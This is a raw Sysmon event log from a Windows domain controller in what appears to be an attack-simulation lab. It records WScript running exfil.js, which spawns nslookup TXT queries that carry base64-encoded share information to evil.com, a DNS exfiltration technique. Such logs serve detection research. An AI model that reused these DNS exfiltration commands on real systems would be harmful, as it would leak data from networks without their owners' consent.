10341000x8000000000000000203683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.361{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.361{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-C441-000000005F02}3872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.361{2E1864BB-17A1-629A-783D-000000005F02}55526068C:\Windows\System32\WScript.exe{2E1864BB-17CB-629A-C441-000000005F02}3872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.374{2E1864BB-17CB-629A-C441-000000005F02}3872C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlunnx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.361{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrtnwv.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.339{2E1864BB-17CB-629A-C241-000000005F02}41485916C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-C341-000000005F02}7336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.339{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.339{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.339{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.339{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.339{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-C341-000000005F02}7336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.339{2E1864BB-17CB-629A-C141-000000005F02}28485164C:\Windows\system32\cmd.exe{2E1864BB-17CB-629A-C341-000000005F02}7336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.342{2E1864BB-17CB-629A-C341-000000005F02}7336C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CB-629A-C141-000000005F02}2848C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrtnwv.tmp 2>&1 10341000x8000000000000000203670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.308{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-C241-000000005F02}4148C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.308{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-C241-000000005F02}4148C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.308{2E1864BB-17CB-629A-C241-000000005F02}41485916C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-C141-000000005F02}2848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.292{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-C241-000000005F02}4148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.277{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.277{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.277{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.277{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.277{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-C141-000000005F02}2848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.277{2E1864BB-17A1-629A-783D-000000005F02}55527184C:\Windows\System32\WScript.exe{2E1864BB-17CB-629A-C141-000000005F02}2848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.287{2E1864BB-17CB-629A-C141-000000005F02}2848C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrtnwv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.277{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltwn.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000203658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.239{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.224{2E1864BB-17CB-629A-BF41-000000005F02}3365980C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-C041-000000005F02}5480C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.208{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.208{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.208{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.208{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.208{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-C041-000000005F02}5480C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 